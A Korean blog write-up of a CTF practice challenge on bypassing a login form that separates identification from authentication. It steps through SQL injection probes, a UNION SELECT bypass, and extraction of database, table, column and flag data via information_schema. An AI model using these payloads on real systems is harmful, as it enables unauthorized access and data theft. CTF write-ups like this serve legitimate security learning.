모의해킹 스터디 CTF 문제 - Login Bypass 3

이번 문제는 normaltic3로 로그인을 성공하면 되는 문제이다.

특이사항이 없다.

UserId: doldol' and '1'='1 / Password: ‘아무 글자’ → 로그인 실패
UserId: doldol' and '1'='1 / Password: ‘doldol 비밀번호’ → 로그인 성공
- sql 인젝션 공격이 가능하다.
UserId: doldol' or '1'='1 / Password: ‘아무 글자’ → 로그인 실패
UserId: doldol' or '1'='1 / Password: ‘doldol 비밀번호’ → 로그인 실패
- ‘or’ 글자를 필터링 하였다. or 식별/인증 분리 로직이다.
UserId: doldol' || '1'='1 / Password: ‘doldol 비밀번호’ → 로그인 실패
UserId: doldol' || '1'='1 / Password: ‘아무 글자’ → 로그인 실패
- ‘||’ 글자를 필터링 하였다. or 식별/인증 분리 로직이다.
UserId: doldol' - - / Password: ‘아무 글자’ → 로그인 실패
UserId: doldol' - - / Password: ‘doldol 비밀번호’ → 로그인 실패
- ‘- -’ 글자를 필터링 하였다 or 식별/인증 분리 로직이다.
UserId: doldol' # / Password: ‘아무 글자’ → 로그인 실패
UserId: doldol' # / Password: ‘doldol 비밀번호’ → 로그인 성공
- 식별/인증 분리 로직이다.

SQL 구문은

SELECT * FROM 테이블명 WHERE userId = {UserId}
if(dbPassword == {Password}) { }

해당 구조로 예상된다.

식별 / 인증 분리 로직이므로 로그인해야 할 UserId만 주어진 상황에서는 지금까지 해왔던 SQL 인젝션과 다른 방법을 시도해 봐야 한다.

컬럼 개수는 알지만 각 컬럼의 위치는 정확히 모르는 상태이므로

' UNION SELECT 'normaltic3', '1234' #

UserId 의 값을 비워주고 UNION을 작성한다.

컬럼명 1	컬럼명2
nomarltic3	1234

해당처럼 조회한다. 해당 결과는 서버는 클라이언트로 보내준다.

주석이 없는 ' UNION SELECT 'normaltic3', '1234 도 로그인이 성공하는 것으로 봐선 예상했던 쿼리 구조가 맞는 것 같다.

UNION사용이 가능하다면 DB전체 추출도 시도해 볼만하다.

1. DB 명 추출

' UNION select database(), '1234

2. 테이블명 추출

 ' UNION SELECT GROUP_CONCAT(table_name), '1234' from information_schema.tables where table_schema = '스키마명' #

총 5개가 나온다. 여기서 플래그에 관련한 테이블의 컬럼을 추출해보려고 한다.

3. 컬럼명 추출

 ' UNION SELECT GROUP_CONCAT(column_name), '1234' from information_schema.columns where table_name = '태이블명

총 2개가 나오는 걸 볼 수 있다. 이제 데이터를 추출해 보자.

4, 데이터 추출

 ' UNION SELECT 컬럼명, '1234' from 테이블명 #

마지막 한 컬럼도 추출하면 각각의 플래그 값을 확인해 볼 수 있다.

UNION을 사용하여 데이터들 추출할 수 있는 방법에 대해 배웠다.
UNION을 사용할 때 GROUT_CONCAT을 사용하였지만 더 사이트의 구성에 따라 여러 데이터가 안 보일 수 있는 상황이 올 수 있다. 이때 LIMIT를 사용하여 한 줄 씩만 출력하거나 개발자도구를 활용하여 여러 데이터를 한 번에 보일 수 있게 하면 될 것 같다.

728x90

티스토리툴바